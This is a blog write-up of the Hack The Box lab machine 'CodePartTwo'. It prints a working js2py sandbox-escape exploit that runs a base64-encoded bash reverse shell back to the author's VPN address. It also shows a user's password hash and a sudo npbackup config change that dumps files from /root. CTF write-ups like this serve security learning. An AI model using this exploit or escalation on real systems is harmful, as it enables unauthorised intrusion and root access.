Skip to main content
HashnodeWriteups

Command Palette

Search for a command to run...

HTB- CodePartTwo

Published
3 min read
HTB- CodePartTwo
S
Shreyas D R
Part of seriesHTB -Boxes Writeups

Recon:

Found a website at :8000

Dirb returned a /download

Downloading app.zip.

We found js2py in requirement (its vulnerable !!)

Now for js2py I found an exploit : Github

Setup a netcat at 4444 and make sure to modify IP to your VPN.

import js2py
import requests
import json

url = 'http://codetwo.htb:8000/run_code'

js_code = """
let cmd = "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuODYvNDQ0NCAwPiYxKSAm|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result;
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log(result);
result;
"""

payload = {"code": js_code}
headers = {"Content-Type": "application/json"}

r = requests.post(url, data=json.dumps(payload), headers=headers)
print(r.text)

Here you will find users.db with a md5 hash at /app/instance

marco:649c9d65a206a75f5abe509fe128bce5

After cracking the hash now ssh into marco@codetwo.htb

We got the user flag here yayy!!.

Now you can notice that there’s a file named npbackup.conf. Alter to the file to the following (just changed the backup path to /root ):

conf_version: 3.0.1
audience: public
repos:
  default:
    repo_uri: 
      __NPBACKUP__wd9051w9Y0p4ZYWmIxMqKHP81/phMlzIOYsL01M9Z7IxNzQzOTEwMDcxLjM5NjQ0Mg8PDw8PDw8PDw8PDw8PD6yVSCEXjl8/9rIqYrh8kIRhlKm4UPcem5kIIFPhSpDU+e+E__NPBACKUP__
    repo_group: default_group
    backup_opts:
      paths:
      - /root
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: 
        __NPBACKUP__v2zdDN21b0c7TSeUZlwezkPj3n8wlR9Cu1IJSMrSctoxNzQzOTEwMDcxLjM5NjcyNQ8PDw8PDw8PDw8PDw8PD0z8n8DrGuJ3ZVWJwhBl0GHtbaQ8lL3fB0M=__NPBACKUP__
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  default_group:
    backup_opts:
      paths: []
      source_type:
      stdin_from_command:
      stdin_filename:
      tags: []
      compression: auto
      use_fs_snapshot: true
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files:
      - excludes/generic_excluded_extensions
      - excludes/generic_excludes
      - excludes/windows_excludes
      - excludes/linux_excludes
      exclude_patterns: []
      exclude_files_larger_than:
      additional_parameters:
      additional_backup_only_parameters:
      minimum_backup_size_error: 10 MiB
      pre_exec_commands: []
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password:
      repo_password_command:
      minimum_backup_age: 1440
      upload_speed: 800 Mib
      download_speed: 0 Mib
      backend_connections: 0
      retention_policy:
        last: 3
        hourly: 72
        daily: 30
        weekly: 4
        monthly: 12
        yearly: 3
        tags: []
        keep_within: true
        group_by_host: true
        group_by_tags: true
        group_by_paths: false
        ntp_server:
      prune_max_unused: 0 B
      prune_max_repack_size:
    prometheus:
      backup_job: ${MACHINE_ID}
      group: ${MACHINE_GROUP}
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: ${HOSTNAME}__blw0
  machine_group:
global_prometheus:
  metrics: false
  instance: ${MACHINE_ID}
  destination:
  http_username:
  http_password:
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url:
  auto_upgrade_server_username:
  auto_upgrade_server_password:
  auto_upgrade_host_identity: ${MACHINE_ID}
  auto_upgrade_group: ${MACHINE_GROUP}

Now run sudo /usr/local/bin/npbackup-cli -c npbackup.conf -b and then sudo /usr/local/bin/npbackup-cli -c npbackup.conf --dump /root/root.txt.

This got us the root flag yayy!!

This was a good box but very script oriented and required a lot of tweaking around . Modifying the payload was the hardest part ( I had a lot of help ) . The rest was pretty reasonable . I rate this box 8/10 for difficulty (not recommended for beginners ) . But it did teach me a lot

As usual catch you guys in the next one !!

#htb-writeup

Comments

Join the discussion

No comments yet. Be the first to comment.

HTB -Boxes Writeups

Part 2 of 6

Writeups for all my solves in HTB

Up next

HTB-Editor Machine writeup

Enumeration gave us a website at wiki.editorial.htb The version for this was clearly visible: Searching around I found an exploit : CVE-2025-24893 Following the instructions I got the shell. Now came the hardest part finding the hibernate.xml file...

More from this blog

W

Writeups

12 posts